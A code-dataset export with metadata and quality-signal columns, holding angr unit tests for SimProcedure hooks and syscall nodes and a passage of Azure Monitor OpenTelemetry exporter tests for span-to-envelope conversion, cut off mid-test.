hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f47ae539f11c1c6de28602ec2f190b5bbf778e70 | 3,701 | py | Python | tests/test_sim_procedure.py | hwu71/angr | cd306a128e36a570452174d943ac14934680dae2 | [
"BSD-2-Clause"
] | null | null | null | tests/test_sim_procedure.py | hwu71/angr | cd306a128e36a570452174d943ac14934680dae2 | [
"BSD-2-Clause"
] | null | null | null | tests/test_sim_procedure.py | hwu71/angr | cd306a128e36a570452174d943ac14934680dae2 | [
"BSD-2-Clause"
] | null | null | null | import os
import angr
import claripy
import nose
from angr.codenode import BlockNode, HookNode, SyscallNode
BIN_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..', 'binaries')
def test_ret_float():
class F1(angr.SimProcedure):
def run(self):
return 12.5
p = angr.load_shellcode(b'X', arch='i386')
p.hook(0x1000, F1(prototype='float (x)();'))
p.hook(0x2000, F1(prototype='double (x)();'))
s = p.factory.call_state(addr=0x1000, ret_addr=0, prototype='float(x)()')
succ = s.step()
nose.tools.assert_equal(len(succ.successors), 1)
s2 = succ.flat_successors[0]
nose.tools.assert_false(s2.regs.st0.symbolic)
nose.tools.assert_equal(s2.solver.eval(s2.regs.st0.raw_to_fp()), 12.5)
s = p.factory.call_state(addr=0x2000, ret_addr=0, prototype='double(x)()')
succ = s.step()
nose.tools.assert_equal(len(succ.successors), 1)
s2 = succ.flat_successors[0]
nose.tools.assert_false(s2.regs.st0.symbolic)
nose.tools.assert_equal(s2.solver.eval(s2.regs.st0.raw_to_fp()), 12.5)
p = angr.load_shellcode(b'X', arch='amd64')
p.hook(0x1000, F1(prototype='float (x)();'))
p.hook(0x2000, F1(prototype='double (x)();'))
s = p.factory.call_state(addr=0x1000, ret_addr=0, prototype='float(x)()')
succ = s.step()
nose.tools.assert_equal(len(succ.successors), 1)
s2 = succ.flat_successors[0]
res = s2.registers.load('xmm0', 4).raw_to_fp()
nose.tools.assert_false(res.symbolic)
nose.tools.assert_equal(s2.solver.eval(res), 12.5)
s = p.factory.call_state(addr=0x2000, ret_addr=0, prototype='double(x)()')
succ = s.step()
nose.tools.assert_equal(len(succ.successors), 1)
s2 = succ.flat_successors[0]
res = s2.registers.load('xmm0', 8).raw_to_fp()
nose.tools.assert_false(res.symbolic)
nose.tools.assert_equal(s2.solver.eval(res), 12.5)
def test_syscall_and_simprocedure():
bin_path = os.path.join(BIN_PATH, 'tests', 'cgc', 'CADET_00002')
proj = angr.Project(bin_path, auto_load_libs=False)
cfg = proj.analyses.CFGFast(normalize=True)
# check syscall
node = cfg.get_any_node(proj.loader.kernel_object.mapped_base + 1)
func = proj.kb.functions[node.addr]
nose.tools.assert_true(node.is_simprocedure)
nose.tools.assert_true(node.is_syscall)
nose.tools.assert_false(node.to_codenode().is_hook)
nose.tools.assert_false(proj.is_hooked(node.addr))
nose.tools.assert_true(func.is_syscall)
nose.tools.assert_true(func.is_simprocedure)
nose.tools.assert_equal(type(proj.factory.snippet(node.addr)), SyscallNode)
# check normal functions
node = cfg.get_any_node(0x80480a0)
func = proj.kb.functions[node.addr]
nose.tools.assert_false(node.is_simprocedure)
nose.tools.assert_false(node.is_syscall)
nose.tools.assert_false(proj.is_hooked(node.addr))
nose.tools.assert_false(func.is_syscall)
nose.tools.assert_false(func.is_simprocedure)
nose.tools.assert_equal(type(proj.factory.snippet(node.addr)), BlockNode)
# check hooked functions
proj.hook(0x80480a0, angr.SIM_PROCEDURES['libc']['puts']())
cfg = proj.analyses.CFGFast(normalize=True)# rebuild cfg to updated nodes
node = cfg.get_any_node(0x80480a0)
func = proj.kb.functions[node.addr]
nose.tools.assert_true(node.is_simprocedure)
nose.tools.assert_false(node.is_syscall)
nose.tools.assert_true(proj.is_hooked(node.addr))
nose.tools.assert_false(func.is_syscall)
nose.tools.assert_true(func.is_simprocedure)
nose.tools.assert_equal(type(proj.factory.snippet(node.addr)), HookNode)
if __name__ == '__main__':
test_ret_float()
test_syscall_and_simprocedure()
| 37.383838 | 92 | 0.708187 | 561 | 3,701 | 4.479501 | 0.204991 | 0.111023 | 0.185038 | 0.103462 | 0.788699 | 0.766813 | 0.730203 | 0.717071 | 0.717071 | 0.696777 | 0 | 0.039548 | 0.139152 | 3,701 | 98 | 93 | 37.765306 | 0.749215 | 0.023777 | 0 | 0.592105 | 0 | 0 | 0.043792 | 0 | 0 | 0 | 0.020787 | 0 | 0.407895 | 1 | 0.039474 | false | 0 | 0.065789 | 0.013158 | 0.131579 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bea8033ccbd7afc2e3bb002cd3fdf4f317067cdf | 35,327 | py | Python | azure_monitor/tests/trace/test_trace.py | yao-cqc/opentelemetry-azure-monitor-python | ecd0cd1d323a510be32cf0b1213e82e6d01e74e4 | [
"MIT"
] | 13 | 2020-04-03T17:17:45.000Z | 2021-06-08T15:23:03.000Z | azure_monitor/tests/trace/test_trace.py | yao-cqc/opentelemetry-azure-monitor-python | ecd0cd1d323a510be32cf0b1213e82e6d01e74e4 | [
"MIT"
] | 72 | 2020-03-24T10:42:06.000Z | 2021-01-28T23:39:42.000Z | azure_monitor/tests/trace/test_trace.py | microsoft/azure-monitor-opentelemetry-exporters-python | 3bd8b514ebef803ae622e308f867799cfab9dc5c | [
"MIT"
] | 11 | 2020-04-27T20:01:31.000Z | 2021-11-02T14:54:14.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
import json
import os
import shutil
import unittest
from unittest import mock
# pylint: disable=import-error
from opentelemetry.sdk.trace import Span
from opentelemetry.sdk.trace.export import SpanExportResult
from opentelemetry.trace import Link, SpanContext, SpanKind
from opentelemetry.trace.status import Status, StatusCanonicalCode
from azure_monitor.export import ExportResult
from azure_monitor.export.trace import (
AzureMonitorSpanExporter,
indicate_processed_by_metric_extractors,
)
from azure_monitor.options import ExporterOptions
TEST_FOLDER = os.path.abspath(".test")
STORAGE_PATH = os.path.join(TEST_FOLDER)
# pylint: disable=invalid-name
def setUpModule():
os.makedirs(TEST_FOLDER)
# pylint: disable=invalid-name
def tearDownModule():
shutil.rmtree(TEST_FOLDER)
def throw(exc_type, *args, **kwargs):
def func(*_args, **_kwargs):
raise exc_type(*args, **kwargs)
return func
# pylint: disable=import-error
# pylint: disable=protected-access
# pylint: disable=too-many-lines
class TestAzureExporter(unittest.TestCase):
@classmethod
def setUpClass(cls):
os.environ.clear()
os.environ[
"APPINSIGHTS_INSTRUMENTATIONKEY"
] = "1234abcd-5678-4efa-8abc-1234567890ab"
cls._exporter = AzureMonitorSpanExporter(storage_path=STORAGE_PATH)
def setUp(self):
for filename in os.listdir(STORAGE_PATH):
file_path = os.path.join(STORAGE_PATH, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except OSError as e:
print("Failed to delete %s. Reason: %s" % (file_path, e))
def test_constructor(self):
"""Test the constructor."""
exporter = AzureMonitorSpanExporter(
instrumentation_key="4321abcd-5678-4efa-8abc-1234567890ab",
storage_path=os.path.join(TEST_FOLDER, self.id()),
storage_max_size=50,
storage_maintenance_period=100,
storage_retention_period=200,
proxies={"asd": "123"},
timeout=5.0,
)
self.assertIsInstance(exporter.options, ExporterOptions)
self.assertEqual(
exporter.options.instrumentation_key,
"4321abcd-5678-4efa-8abc-1234567890ab",
)
self.assertEqual(
exporter.storage.path, os.path.join(TEST_FOLDER, self.id())
)
self.assertEqual(exporter.storage.max_size, 50)
self.assertEqual(exporter.storage.maintenance_period, 100)
self.assertEqual(exporter.storage.retention_period, 200)
self.assertEqual(exporter.options.proxies, {"asd": "123"})
self.assertEqual(exporter.options.timeout, 5.0)
self.assertEqual(
exporter._telemetry_processors[0],
indicate_processed_by_metric_extractors,
)
def test_export_empty(self):
exporter = self._exporter
exporter.export([])
self.assertEqual(len(os.listdir(exporter.storage.path)), 0)
def test_export_failure(self):
exporter = self._exporter
with mock.patch(
"azure_monitor.export.trace.AzureMonitorSpanExporter._transmit"
) as transmit: # noqa: E501
test_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
test_span.start()
test_span.end()
transmit.return_value = ExportResult.FAILED_RETRYABLE
exporter.export([test_span])
self.assertEqual(len(os.listdir(exporter.storage.path)), 1)
self.assertIsNone(exporter.storage.get())
def test_export_success(self):
exporter = self._exporter
test_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
test_span.start()
test_span.end()
with mock.patch(
"azure_monitor.export.trace.AzureMonitorSpanExporter._transmit"
) as transmit: # noqa: E501
transmit.return_value = ExportResult.SUCCESS
storage_mock = mock.Mock()
exporter._transmit_from_storage = storage_mock
exporter.export([test_span])
self.assertEqual(len(exporter._telemetry_processors), 1)
self.assertEqual(storage_mock.call_count, 1)
self.assertEqual(len(os.listdir(exporter.storage.path)), 0)
@mock.patch("azure_monitor.export.trace.logger")
def test_export_exception(self, logger_mock):
test_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
test_span.start()
test_span.end()
exporter = self._exporter
with mock.patch(
"azure_monitor.export.trace.AzureMonitorSpanExporter._transmit",
throw(Exception),
): # noqa: E501
result = exporter.export([test_span])
self.assertEqual(result, SpanExportResult.FAILURE)
self.assertEqual(logger_mock.exception.called, True)
def test_export_not_retryable(self):
exporter = self._exporter
test_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
test_span.start()
test_span.end()
with mock.patch(
"azure_monitor.export.trace.AzureMonitorSpanExporter._transmit"
) as transmit: # noqa: E501
transmit.return_value = ExportResult.FAILED_NOT_RETRYABLE
result = exporter.export([test_span])
self.assertEqual(result, SpanExportResult.FAILURE)
def test_indicate_processed_by_metric_extractors(self):
envelope = mock.Mock()
envelope.data.base_type = "RemoteDependencyData"
envelope.data.base_data.properties = {}
indicate_processed_by_metric_extractors(envelope)
self.assertEqual(
envelope.data.base_data.properties[
"_MS.ProcessedByMetricExtractors"
],
"(Name:'Dependencies',Ver:'1.1')",
)
envelope.data.base_type = "RequestData"
indicate_processed_by_metric_extractors(envelope)
self.assertEqual(
envelope.data.base_data.properties[
"_MS.ProcessedByMetricExtractors"
],
"(Name:'Requests',Ver:'1.1')",
)
def test_span_to_envelope_none(self):
exporter = self._exporter
self.assertIsNone(exporter._span_to_envelope(None))
# pylint: disable=too-many-statements
def test_span_to_envelope(self):
exporter = AzureMonitorSpanExporter(
instrumentation_key="12345678-1234-5678-abcd-12345678abcd",
storage_path=os.path.join(TEST_FOLDER, self.id()),
)
parent_span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557338,
is_remote=False,
),
)
start_time = 1575494316027613500
end_time = start_time + 1001000000
# SpanKind.CLIENT HTTP
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.start(start_time=start_time)
span.end(end_time=end_time)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.RemoteDependency"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.name, "GET//wiki/Rabbit")
self.assertEqual(
envelope.data.base_data.data,
"https://www.wikipedia.org/wiki/Rabbit",
)
self.assertEqual(envelope.data.base_data.target, "www.wikipedia.org")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.result_code, "200")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.type, "HTTP")
self.assertEqual(envelope.data.base_type, "RemoteDependencyData")
# SpanKind.CLIENT unknown type
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.RemoteDependency"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.name, "test")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.type, None)
self.assertEqual(envelope.data.base_type, "RemoteDependencyData")
# SpanKind.CLIENT missing method
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.RemoteDependency"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.name, "test")
self.assertEqual(
envelope.data.base_data.data,
"https://www.wikipedia.org/wiki/Rabbit",
)
self.assertEqual(envelope.data.base_data.target, "www.wikipedia.org")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.result_code, "200")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.type, "HTTP")
self.assertEqual(envelope.data.base_type, "RemoteDependencyData")
# SpanKind.SERVER HTTP - 200 request
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.path": "/wiki/Rabbit",
"http.route": "/wiki/Rabbit",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.Request"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(
envelope.tags["ai.operation.name"], "GET /wiki/Rabbit"
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.response_code, "200")
self.assertEqual(envelope.data.base_data.name, "GET /wiki/Rabbit")
self.assertEqual(envelope.data.base_data.success, True)
self.assertEqual(
envelope.data.base_data.url,
"https://www.wikipedia.org/wiki/Rabbit",
)
self.assertEqual(envelope.data.base_type, "RequestData")
# SpanKind.SERVER HTTP - Failed request
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.path": "/wiki/Rabbit",
"http.route": "/wiki/Rabbit",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.Request"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(
envelope.tags["ai.operation.name"], "GET /wiki/Rabbit"
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.response_code, "400")
self.assertEqual(envelope.data.base_data.name, "GET /wiki/Rabbit")
self.assertEqual(envelope.data.base_data.success, False)
self.assertEqual(
envelope.data.base_data.url,
"https://www.wikipedia.org/wiki/Rabbit",
)
self.assertEqual(envelope.data.base_type, "RequestData")
# SpanKind.SERVER unknown type
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.path": "/wiki/Rabbit",
"http.route": "/wiki/Rabbit",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 400,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.Request"
)
self.assertEqual(
envelope.tags["ai.operation.parentId"], "a6f5d48acb4d31da"
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_type, "RequestData")
# SpanKind.INTERNAL
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=None,
sampler=None,
trace_config=None,
resource=None,
attributes={"key1": "value1"},
events=None,
links=[],
kind=SpanKind.INTERNAL,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.ikey, "12345678-1234-5678-abcd-12345678abcd")
self.assertEqual(
envelope.name, "Microsoft.ApplicationInsights.RemoteDependency"
)
self.assertRaises(
KeyError, lambda: envelope.tags["ai.operation.parentId"]
)
self.assertEqual(
envelope.tags["ai.operation.id"],
"1bbd944a73a05d89eab5d3740a213ee7",
)
self.assertEqual(envelope.time, "2019-12-04T21:18:36.027613Z")
self.assertEqual(envelope.data.base_data.name, "test")
self.assertEqual(envelope.data.base_data.duration, "0.00:00:01.001")
self.assertEqual(envelope.data.base_data.id, "a6f5d48acb4d31d9")
self.assertEqual(envelope.data.base_data.type, "InProc")
self.assertEqual(envelope.data.base_type, "RemoteDependencyData")
# Attributes
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
"test": "asd",
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(len(envelope.data.base_data.properties), 2)
self.assertEqual(
envelope.data.base_data.properties["component"], "http"
)
self.assertEqual(envelope.data.base_data.properties["test"], "asd")
# Links
links = []
links.append(
Link(
context=SpanContext(
trace_id=36873507687745823477771305566750195432,
span_id=12030755672171557338,
is_remote=False,
)
)
)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 200,
},
events=None,
links=links,
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(len(envelope.data.base_data.properties), 2)
json_dict = json.loads(
envelope.data.base_data.properties["_MS.links"]
)[0]
self.assertEqual(json_dict["id"], "a6f5d48acb4d31da")
# Status
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 500,
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.response_code, "500")
self.assertFalse(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
"http.status_code": 500,
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.result_code, "500")
self.assertFalse(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
},
events=None,
links=[],
kind=SpanKind.SERVER,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.response_code, "0")
self.assertTrue(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
"http.url": "https://www.wikipedia.org/wiki/Rabbit",
},
events=None,
links=[],
kind=SpanKind.CLIENT,
)
span.status = Status(canonical_code=StatusCanonicalCode.OK)
span.start(start_time=start_time)
span.end(end_time=end_time)
envelope = exporter._span_to_envelope(span)
self.assertEqual(envelope.data.base_data.result_code, "0")
self.assertTrue(envelope.data.base_data.success)
span = Span(
name="test",
context=SpanContext(
trace_id=36873507687745823477771305566750195431,
span_id=12030755672171557337,
is_remote=False,
),
parent=parent_span,
sampler=None,
trace_config=None,
resource=None,
attributes={
"component": "http",
"http.method": "GET",
